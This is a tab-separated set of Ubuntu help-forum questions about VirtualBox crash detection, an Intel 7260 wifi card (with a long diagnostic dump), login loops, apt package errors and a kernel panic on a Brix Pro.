489155	how can i detect if a vm is crashed ?	i installed 4 ubuntu virtual machines ( in virtualbox which itself is hosted by ubuntu ) . i am allowed to used only one of them at once . i can use any other available vm only if the first one crashes ( for whatever the reason is ) . how can i detect if a vm is crashed using any programming language , comman line or any available method ? i want to automate the detection of the crash of a given vm in order to launch an other one automatically too .
489157	intel wireless 7260 card does n't connect to wifi sometimes	( also posted in reddit ) i have a strange problem . my machine sometimes ( more often no than yes ) does n't connect to my home wifi . i can connect to android devices hot spot easily . windows machine connects as well . finally , i can use my android devices as a usb wifi card . i know i should put some data here , i do n't what technical data i should put , but here are some anecdotes : currently , my home network does n't have a password , or spaces in its name . from my experience , if i wait long enough ( like an hour ) the chances are it will connect are higher . this might be a coincidental , but often , the machine connects right after i plug my phone as wifi card . i have two lenovo machines ( edge 13 and ideapad u330p ) both does n't connect . the edge machine currently runs arch , but ubuntu did n't connect with it as well . interestingly , live usb of lubuntu connected on the edge machine . i 'm more concerned about the ideapad machine as the edge machine is soon to turn into a stationary machine that connects via cable . so , how do i avoid/handle the mishaps ? things i have tried : updating the intel firmware - it still does n't connect . i note that to stop iwlwifi i have to stop both iwlmvm and iwldvm . here is the output of the linked script . i 'm at the campus right now , so things might not seem exactly as i described them . to my understanding , the issue is with network card ( intel 7260 ) which has new firmware available , only i did n't find anyway to activate it . # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux twisting 3.13.0-30-generic # 54-ubuntu smp mon jun 9 22:45:01 utc 2014 x86_64 x86_64 x86_64 gnu/linux # # # # # lspci # # # # # 02:00.0 network controller [ 0280 ] : intel corporation wireless 7260 [ 8086:08b2 ] ( rev 73 ) subsystem : intel corporation wireless-n 7260 [ 8086:4262 ] kernel driver in use : iwlwifi # # # # # lsusb # # # # # bus 001 device 002 : id 8087:8000 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 002 device 004 : id 8087:07dc intel corp . bus 002 device 003 : id 0bda:572a realtek semiconductor corp . bus 002 device 007 : id 1058:070a western digital technologies , inc. my passport essential se bus 002 device 006 : id 18d1:4ee4 google inc. nexus 4 ( debug + tether ) bus 002 device 005 : id 045e:009d microsoft corp. wireless optical desktop 3.0 bus 002 device 002 : id 0424:2514 standard microsystems corp. usb 2.0 hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : no # # # # # lsmod # # # # # iwlmvm 189774 0 mac80211 626557 1 iwlmvm iwlwifi 169932 1 iwlmvm cfg80211 484040 3 iwlwifi , mac80211 , iwlmvm # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss # # # # # interfaces # # # # # # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback # # # # # iwconfig # # # # # wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off power management : on # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.42.129 0.0.0.0 ug 0 0 0 usb0 192.168.42.0 0.0.0.0 255.255.255.0 u 1 0 0 usb0 # # # # # resolv.conf # # # # # nameserver 127.0.1.1 # # # # # nm-tool # # # # # networkmanager tool state : connected ( global ) - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwlwifi state : disconnected default : no hw address : < mac address removed > capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points - device : usb0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : rndis_host state : connected default : yes hw address : < mac address removed > capabilities : carrier detect : yes wired properties carrier : on ipv4 settings : address : 192.168.42.185 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.42.129 dns : 192.168.42.129 # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # # # # # iwlist # # # # # wlan0 no scan results # # # # # iwlist channel # # # # # wlan0 13 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz # # # # # modinfo # # # # # filename : /lib/modules/3.13.0-30-generic/kernel/drivers/net/wireless/iwlwifi/mvm/iwlmvm.ko license : gpl author : copyright ( c ) 2003-2013 intel corporation < ilw @ linux.intel.com > version : in-tree : description : the new intel ( r ) wireless agn driver for linux srcversion : 964b69f7ebc572be39f5c50 depends : iwlwifi , mac80211 , cfg80211 intree : y vermagic : 3.13.0-30-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :20 : e4:8d : ac : c7 : db:4a:17:03:31 : cc:24:8d:65 sig_hashalgo : sha512 parm : init_dbg : set to true to debug an assert in init fw ( default : false ( bool ) parm : power_scheme : power management scheme : 1-active , 2-balanced , 3-low power , default : 2 ( int ) filename : /lib/modules/3.13.0-30-generic/kernel/drivers/net/wireless/iwlwifi/iwlwifi.ko license : gpl author : copyright ( c ) 2003-2013 intel corporation < ilw @ linux.intel.com > version : in-tree : description : intel ( r ) wireless wifi driver for linux firmware : iwlwifi-100-5.ucode firmware : iwlwifi-1000-5.ucode firmware : iwlwifi-135-6.ucode firmware : iwlwifi-105-6.ucode firmware : iwlwifi-2030-6.ucode firmware : iwlwifi-2000-6.ucode firmware : iwlwifi-5150-2.ucode firmware : iwlwifi-5000-5.ucode firmware : iwlwifi-6000g2b-6.ucode firmware : iwlwifi-6000g2a-5.ucode firmware : iwlwifi-6050-5.ucode firmware : iwlwifi-6000-4.ucode firmware : iwlwifi-3160-7.ucode firmware : iwlwifi-7260-7.ucode srcversion : 1e6912e109d5a43b310fb34 alias : pci : v00008086d0000095asv*sd00005490bc*sc*i* alias : pci : v00008086d0000095bsv*sd00005290bc*sc*i* alias : pci : v00008086d0000095asv*sd00005590bc*sc*i* alias : pci : v00008086d0000095asv*sd00005190bc*sc*i* alias : pci : v00008086d0000095asv*sd00005090bc*sc*i* alias : pci : v00008086d0000095asv*sd00005420bc*sc*i* alias : pci : v00008086d0000095asv*sd0000502abc*sc*i* alias : pci : v00008086d0000095asv*sd00005020bc*sc*i* alias : pci : v00008086d0000095asv*sd00009410bc*sc*i* alias : pci : v00008086d0000095asv*sd00009310bc*sc*i* alias : pci : v00008086d0000095asv*sd00009510bc*sc*i* alias : pci : v00008086d0000095asv*sd00009210bc*sc*i* alias : pci : v00008086d0000095asv*sd00009112bc*sc*i* alias : pci : v00008086d0000095asv*sd00009110bc*sc*i* alias : pci : v00008086d0000095asv*sd00009012bc*sc*i* alias : pci : v00008086d0000095asv*sd00009010bc*sc*i* alias : pci : v00008086d0000095bsv*sd00005202bc*sc*i* alias : pci : v00008086d0000095asv*sd00005002bc*sc*i* alias : pci : v00008086d0000095bsv*sd00005200bc*sc*i* alias : pci : v00008086d0000095asv*sd0000500abc*sc*i* alias : pci : v00008086d0000095asv*sd00005000bc*sc*i* alias : pci : v00008086d0000095asv*sd00001010bc*sc*i* alias : pci : v00008086d0000095asv*sd00005400bc*sc*i* alias : pci : v00008086d0000095asv*sd00005410bc*sc*i* alias : pci : v00008086d0000095asv*sd00005012bc*sc*i* alias : pci : v00008086d0000095bsv*sd00005210bc*sc*i* alias : pci : v00008086d0000095bsv*sd00005302bc*sc*i* alias : pci : v00008086d0000095bsv*sd00005310bc*sc*i* alias : pci : v00008086d0000095asv*sd0000510abc*sc*i* alias : pci : v00008086d0000095asv*sd00005100bc*sc*i* alias : pci : v00008086d0000095asv*sd00005112bc*sc*i* alias : pci : v00008086d0000095asv*sd00005110bc*sc*i* alias : pci : v00008086d0000095asv*sd00005010bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008570bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008470bc*sc*i* alias : pci : v00008086d000008b4sv*sd00008270bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008062bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008060bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008172bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008170bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008072bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008070bc*sc*i* alias : pci : v00008086d000008b4sv*sd00000370bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000472bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000470bc*sc*i* alias : pci : v00008086d000008b4sv*sd00000272bc*sc*i* alias : pci : v00008086d000008b4sv*sd00000270bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000062bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000060bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000172bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000170bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000072bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000070bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c420bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c220bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c02abc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c020bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c360bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c370bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c560bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c570bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c462bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c460bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c472bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c470bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c262bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c26abc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c260bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c272bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c270bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c760bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c770bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c162bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c062bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c160bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c06abc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c060bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c170bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c072bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c070bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004420bc*sc*i* alias : pci : v00008086d000008b2sv*sd00004220bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000402abc*sc*i* alias : pci : v00008086d000008b1sv*sd00004020bc*sc*i* alias : pci : v00008086d000008b1sv*sd00005070bc*sc*i* alias : pci : v00008086d000008b2sv*sd00004360bc*sc*i* alias : pci : v00008086d000008b2sv*sd00004370bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004560bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004570bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004a6cbc*sc*i* alias : pci : v00008086d000008b1sv*sd00004a6ebc*sc*i* alias : pci : v00008086d000008b1sv*sd00004a70bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000486ebc*sc*i* alias : pci : v00008086d000008b1sv*sd00004870bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004462bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000446abc*sc*i* alias : pci : v00008086d000008b1sv*sd00004460bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004472bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004470bc*sc*i* alias : pci : v00008086d000008b2sv*sd00004262bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000426abc*sc*i* alias : pci : v00008086d000008b2sv*sd00004260bc*sc*i* alias : pci : v00008086d000008b2sv*sd00004272bc*sc*i* alias : pci : v00008086d000008b2sv*sd00004270bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004162bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004062bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004160bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000406abc*sc*i* alias : pci : v00008086d000008b1sv*sd00004060bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004170bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004072bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004070bc*sc*i* alias : pci : v00008086d00000892sv*sd00000462bc*sc*i* alias : pci : v00008086d00000893sv*sd00000262bc*sc*i* alias : pci : v00008086d00000892sv*sd00000062bc*sc*i* alias : pci : v00008086d00000894sv*sd00000822bc*sc*i* alias : pci : v00008086d00000894sv*sd00000422bc*sc*i* alias : pci : v00008086d00000895sv*sd00000222bc*sc*i* alias : pci : v00008086d00000894sv*sd00000022bc*sc*i* alias : pci : v00008086d0000088fsv*sd00005260bc*sc*i* alias : pci : v00008086d0000088esv*sd00004860bc*sc*i* alias : pci : v00008086d0000088esv*sd0000446abc*sc*i* alias : pci : v00008086d0000088esv*sd00004460bc*sc*i* alias : pci : v00008086d0000088fsv*sd0000426abc*sc*i* alias : pci : v00008086d0000088fsv*sd00004260bc*sc*i* alias : pci : v00008086d0000088esv*sd0000406abc*sc*i* alias : pci : v00008086d0000088esv*sd00004060bc*sc*i* alias : pci : v00008086d00000887sv*sd00004462bc*sc*i* alias : pci : v00008086d00000888sv*sd00004262bc*sc*i* alias : pci : v00008086d00000887sv*sd00004062bc*sc*i* alias : pci : v00008086d00000890sv*sd00004822bc*sc*i* alias : pci : v00008086d00000890sv*sd00004422bc*sc*i* alias : pci : v00008086d00000891sv*sd00004222bc*sc*i* alias : pci : v00008086d00000890sv*sd00004022bc*sc*i* alias : pci : v00008086d00000896sv*sd00005027bc*sc*i* alias : pci : v00008086d00000896sv*sd00005025bc*sc*i* alias : pci : v00008086d00000897sv*sd00005017bc*sc*i* alias : pci : v00008086d00000897sv*sd00005015bc*sc*i* alias : pci : v00008086d00000896sv*sd00005007bc*sc*i* alias : pci : v00008086d00000896sv*sd00005005bc*sc*i* alias : pci : v00008086d000008aesv*sd00001027bc*sc*i* alias : pci : v00008086d000008aesv*sd00001025bc*sc*i* alias : pci : v00008086d000008afsv*sd00001017bc*sc*i* alias : pci : v00008086d000008afsv*sd00001015bc*sc*i* alias : pci : v00008086d000008aesv*sd00001007bc*sc*i* alias : pci : v00008086d000008aesv*sd00001005bc*sc*i* alias : pci : v00008086d00000084sv*sd00001316bc*sc*i* alias : pci : v00008086d00000084sv*sd00001216bc*sc*i* alias : pci : v00008086d00000083sv*sd00001326bc*sc*i* alias : pci : v00008086d00000083sv*sd00001226bc*sc*i* alias : pci : v00008086d00000083sv*sd00001306bc*sc*i* alias : pci : v00008086d00000083sv*sd00001206bc*sc*i* alias : pci : v00008086d00000084sv*sd00001315bc*sc*i* alias : pci : v00008086d00000084sv*sd00001215bc*sc*i* alias : pci : v00008086d00000083sv*sd00001325bc*sc*i* alias : pci : v00008086d00000083sv*sd00001225bc*sc*i* alias : pci : v00008086d00000083sv*sd00001305bc*sc*i* alias : pci : v00008086d00000083sv*sd00001205bc*sc*i* alias : pci : v00008086d00000886sv*sd00001317bc*sc*i* alias : pci : v00008086d00000886sv*sd00001315bc*sc*i* alias : pci : v00008086d00000885sv*sd00001327bc*sc*i* alias : pci : v00008086d00000885sv*sd00001325bc*sc*i* alias : pci : v00008086d00000885sv*sd00001307bc*sc*i* alias : pci : v00008086d00000885sv*sd00001305bc*sc*i* alias : pci : v00008086d00000089sv*sd00001316bc*sc*i* alias : pci : v00008086d00000089sv*sd00001311bc*sc*i* alias : pci : v00008086d00000087sv*sd00001326bc*sc*i* alias : pci : v00008086d00000087sv*sd00001321bc*sc*i* alias : pci : v00008086d00000087sv*sd00001306bc*sc*i* alias : pci : v00008086d00000087sv*sd00001301bc*sc*i* alias : pci : v00008086d00000091sv*sd00005226bc*sc*i* alias : pci : v00008086d00000091sv*sd00005225bc*sc*i* alias : pci : v00008086d00000091sv*sd00005221bc*sc*i* alias : pci : v00008086d00000091sv*sd00005207bc*sc*i* alias : pci : v00008086d00000091sv*sd00005206bc*sc*i* alias : pci : v00008086d00000091sv*sd00005205bc*sc*i* alias : pci : v00008086d00000091sv*sd00005201bc*sc*i* alias : pci : v00008086d00000090sv*sd00005216bc*sc*i* alias : pci : v00008086d00000090sv*sd00005215bc*sc*i* alias : pci : v00008086d00000090sv*sd00005211bc*sc*i* alias : pci : v00008086d0000008bsv*sd00005317bc*sc*i* alias : pci : v00008086d0000008bsv*sd00005315bc*sc*i* alias : pci : v00008086d0000008asv*sd00005327bc*sc*i* alias : pci : v00008086d0000008asv*sd00005325bc*sc*i* alias : pci : v00008086d0000008asv*sd00005307bc*sc*i* alias : pci : v00008086d0000008asv*sd00005305bc*sc*i* alias : pci : v00008086d00000082sv*sd00001305bc*sc*i* alias : pci : v00008086d00000082sv*sd00001304bc*sc*i* alias : pci : v00008086d00000082sv*sd00004820bc*sc*i* alias : pci : v00008086d00000085sv*sd0000c228bc*sc*i* alias : pci : v00008086d00000085sv*sd0000c220bc*sc*i* alias : pci : v00008086d00000082sv*sd0000c020bc*sc*i* alias : pci : v00008086d00000085sv*sd00001316bc*sc*i* alias : pci : v00008086d00000085sv*sd00001318bc*sc*i* alias : pci : v00008086d00000085sv*sd00001311bc*sc*i* alias : pci : v00008086d00000082sv*sd00001328bc*sc*i* alias : pci : v00008086d00000082sv*sd00001326bc*sc*i* alias : pci : v00008086d00000082sv*sd00001321bc*sc*i* alias : pci : v00008086d00000082sv*sd00001308bc*sc*i* alias : pci : v00008086d00000082sv*sd00001307bc*sc*i* alias : pci : v00008086d00000082sv*sd00001306bc*sc*i* alias : pci : v00008086d00000082sv*sd00001301bc*sc*i* alias : pci : v00008086d00004239sv*sd00001316bc*sc*i* alias : pci : v00008086d00004239sv*sd00001311bc*sc*i* alias : pci : v00008086d00004238sv*sd00001118bc*sc*i* alias : pci : v00008086d00004238sv*sd00001111bc*sc*i* alias : pci : v00008086d0000422csv*sd00001326bc*sc*i* alias : pci : v00008086d0000422csv*sd00001321bc*sc*i* alias : pci : v00008086d0000422csv*sd00001307bc*sc*i* alias : pci : v00008086d0000422csv*sd00001306bc*sc*i* alias : pci : v00008086d0000422csv*sd00001301bc*sc*i* alias : pci : v00008086d0000422bsv*sd00001128bc*sc*i* alias : pci : v00008086d0000422bsv*sd00001121bc*sc*i* alias : pci : v00008086d0000422bsv*sd00001108bc*sc*i* alias : pci : v00008086d0000422bsv*sd00001101bc*sc*i* alias : pci : v00008086d0000423dsv*sd00001316bc*sc*i* alias : pci : v00008086d0000423dsv*sd00001216bc*sc*i* alias : pci : v00008086d0000423dsv*sd00001311bc*sc*i* alias : pci : v00008086d0000423dsv*sd00001211bc*sc*i* alias : pci : v00008086d0000423csv*sd00001326bc*sc*i* alias : pci : v00008086d0000423csv*sd00001321bc*sc*i* alias : pci : v00008086d0000423csv*sd00001221bc*sc*i* alias : pci : v00008086d0000423csv*sd00001306bc*sc*i* alias : pci : v00008086d0000423csv*sd00001206bc*sc*i* alias : pci : v00008086d0000423csv*sd00001301bc*sc*i* alias : pci : v00008086d0000423csv*sd00001201bc*sc*i* alias : pci : v00008086d0000423bsv*sd00001011bc*sc*i* alias : pci : v00008086d0000423asv*sd00001021bc*sc*i* alias : pci : v00008086d0000423asv*sd00001001bc*sc*i* alias : pci : v00008086d00004236sv*sd00001114bc*sc*i* alias : pci : v00008086d00004236sv*sd00001014bc*sc*i* alias : pci : v00008086d00004236sv*sd00001111bc*sc*i* alias : pci : v00008086d00004236sv*sd00001011bc*sc*i* alias : pci : v00008086d00004235sv*sd00001104bc*sc*i* alias : pci : v00008086d00004235sv*sd00001004bc*sc*i* alias : pci : v00008086d00004235sv*sd00001101bc*sc*i* alias : pci : v00008086d00004235sv*sd00001001bc*sc*i* alias : pci : v00008086d00004235sv*sd00001124bc*sc*i* alias : pci : v00008086d00004235sv*sd00001024bc*sc*i* alias : pci : v00008086d00004235sv*sd00001121bc*sc*i* alias : pci : v00008086d00004235sv*sd00001021bc*sc*i* alias : pci : v00008086d00004237sv*sd00001316bc*sc*i* alias : pci : v00008086d00004237sv*sd00001216bc*sc*i* alias : pci : v00008086d00004237sv*sd00001315bc*sc*i* alias : pci : v00008086d00004237sv*sd00001215bc*sc*i* alias : pci : v00008086d00004237sv*sd00001314bc*sc*i* alias : pci : v00008086d00004237sv*sd00001214bc*sc*i* alias : pci : v00008086d00004237sv*sd00001311bc*sc*i* alias : pci : v00008086d00004237sv*sd00001211bc*sc*i* alias : pci : v00008086d00004232sv*sd00001326bc*sc*i* alias : pci : v00008086d00004232sv*sd00001226bc*sc*i* alias : pci : v00008086d00004232sv*sd00001325bc*sc*i* alias : pci : v00008086d00004232sv*sd00001225bc*sc*i* alias : pci : v00008086d00004232sv*sd00001324bc*sc*i* alias : pci : v00008086d00004232sv*sd00001224bc*sc*i* alias : pci : v00008086d00004232sv*sd00001321bc*sc*i* alias : pci : v00008086d00004232sv*sd00001221bc*sc*i* alias : pci : v00008086d00004232sv*sd00001306bc*sc*i* alias : pci : v00008086d00004232sv*sd00001206bc*sc*i* alias : pci : v00008086d00004232sv*sd00001305bc*sc*i* alias : pci : v00008086d00004232sv*sd00001205bc*sc*i* alias : pci : v00008086d00004232sv*sd00001304bc*sc*i* alias : pci : v00008086d00004232sv*sd00001204bc*sc*i* alias : pci : v00008086d00004232sv*sd00001301bc*sc*i* alias : pci : v00008086d00004232sv*sd00001201bc*sc*i* depends : cfg80211 intree : y vermagic : 3.13.0-30-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :20 : e4:8d : ac : c7 : db:4a:17:03:31 : cc:24:8d:65 sig_hashalgo : sha512 parm : swcrypto : using crypto in software ( default 0 [ hardware ] ) ( int ) parm : 11n_disable : disable 11n functionality , bitmap : 1 : full , 2 : disable agg tx , 4 : disable agg rx , 8 enable agg tx ( uint ) parm : amsdu_size_8k : enable 8k amsdu size ( default 0 ) ( int ) parm : fw_restart : restart firmware in case of error ( default true ) ( bool ) parm : antenna_coupling : specify antenna coupling in db ( defualt : 0 db ) ( int ) parm : wd_disable : disable stuck queue watchdog timer 0=system default , 1=disable , 2=enable ( default : 0 ) ( int ) parm : nvm_file : nvm file name ( charp ) parm : bt_coex_active : enable wifi/bt co-exist ( default : enable ) ( bool ) parm : led_mode:0=system default , 1=on ( rf on ) /off ( rf off ) , 2=blinking , 3=off ( default : 0 ) ( int ) parm : power_save : enable wifi power management ( default : disable ) ( bool ) parm : power_level : default power save level ( range from 1 - 5 , default : 1 ) ( int ) # # # # # modules # # # # # lp rtc # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac [ /etc/modprobe.d/fbdev-blacklist.conf ] blacklist arkfb blacklist aty128fb blacklist atyfb blacklist radeonfb blacklist cirrusfb blacklist cyber2000fb blacklist gx1fb blacklist gxfb blacklist kyrofb blacklist matroxfb_base blacklist mb862xxfb blacklist neofb blacklist nvidiafb blacklist pm2fb blacklist pm3fb blacklist s3fb blacklist savagefb blacklist sisfb blacklist tdfxfb blacklist tridentfb blacklist viafb blacklist vt8623fb # # # # # udev rules # # # # # # pci device 0x8086:0x08b2 ( iwlwifi ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # # # # # dmesg # # # # # [ 1.694403 ] psmouse serio1 : elantech : assuming hardware version 4 ( with firmware version 0x461f01 ) [ 5.421902 ] iwlwifi 0000:02:00.0 : irq 62 for msi/msi-x [ 5.503332 ] iwlwifi 0000:02:00.0 : direct firmware load failed with error -2 [ 5.503333 ] iwlwifi 0000:02:00.0 : falling back to user helper [ 5.521430 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq [ 5.624522 ] bluetooth : hci0 : intel bluetooth firmware patch completed and activated [ 5.927671 ] iwlwifi 0000:02:00.0 : loaded firmware version 22.1.7.0 op_mode iwlmvm [ 6.534354 ] iwlwifi 0000:02:00.0 : detected intel ( r ) wireless n 7260 , rev=0x144 [ 6.534403 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 6.534616 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 6.770451 ] ieee80211 phy0 : selected rate control algorithm 'iwl-mvm-rs' [ 12.058643 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 12.058857 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 12.070328 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 12.070662 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready # # # # # # # # # # wireless info end # # # # # # # # # # # #
489158	ubuntu throws me back to login screen	when i try to login to my system i am automatically thrown back to the login screen.i tried ctrl+alt+f1 but i got an error named 'signature error ' please help ... . i 'm using ubuntu ver 14.04
489161	modifying default kawigiedit c++ template in ubuntu 12.10 lts	i am trying to edit default c++ template of kawigiedit plugin , but after i configure and save the modified template as default template , there is no effect . has anyone modified kawigiedit 's default c++ template in ubuntu 12.10 or any other version ? if so what were the steps ? please help , thanks .
489162	borked my system settings trying to resolve soundcard issue - trusty	i updated my desktop to trusty tahr , and have had issues trying to get the soundcard to work . it 's a : realtek alc880 intel corp 8280ifb/fbm/fr/fw/frw ( ich6 family ) high definition audio controller ( rev3 ) . i did have sound settings which just showed dummy output , but since i followed instructions to remove and install alsa ( via apt-get ) again i 've lost system settings and everything .
489164	vm with host communication	environment presentation : i use virtualbox virtual machine os : ubuntu 12.04 lts host machine os : ubuntu 12.04 lts . problem : i run a program inside a vm which outputs 0 or 1 only : how can i communicate this result from the vm to my host machine ( which is ubuntu 12.04 )
489169	`` unable to locate package ubuntu-restricted-extras ''	after i did a clean installation of ubuntu today , not a single package instalation is working . when i type ; sudo apt-get install ubuntu-restricted-extras it says ; reading package lists ... done building dependency tree reading state information ... done e : unable to locate package ubuntu-restricted-extras same goes for vlc and every package i try to install .
489178	kernal panic on fresh 14.04 install on barebone brix pro i5-4570r	i recently upgraded from the smaller amd barebone brix to the brix pro . the new pc seems to make ubuntu 14.04 crash on boot , a bug which i ca n't see anyone with the same pc having ( too early ? ) . i 've attached the full log but here are the exact variables in play which , in this debugging case , are quite small ( thankfully ! ) : brand new gb-bxi5-4570r . corsair 4gb kit ( 2x2gb ) ddr3l - 1333 sod/mm crucial 256gb ssd the rest is not relevant ( keyboard , mouse , ethernet ) with a clean hard-drive , i 've installed and reinstalled ubuntu 4 times , tried with different hdds ( not the ssd ) and even with multiple ubuntu bootable installs ( different usbs and redownloading the iso ) . once the install is done , i reboot and works fine . i run the first update and restart and then i get that log . on one of the reinstallations , it did n't even get to the updating part , crashed on the first reboot . i tried installing as little as possible to see if something in particular is breaking it but all i can tell is that it happens in that update ( i can restart multiple times before that with no problem ) . the big error comes towards the end of the log and seems to be a kernal panic error , known cause of malfunctioning drivers maybe ? edit after solution : turns out it was indeed the -30 kernel that conflicts with the brix . if you ever get that error , you should simply boot again and go to advanced ubuntu options , select the -24 kernel , and use the solution below ( at least until there is a fix to the current kernel ) .
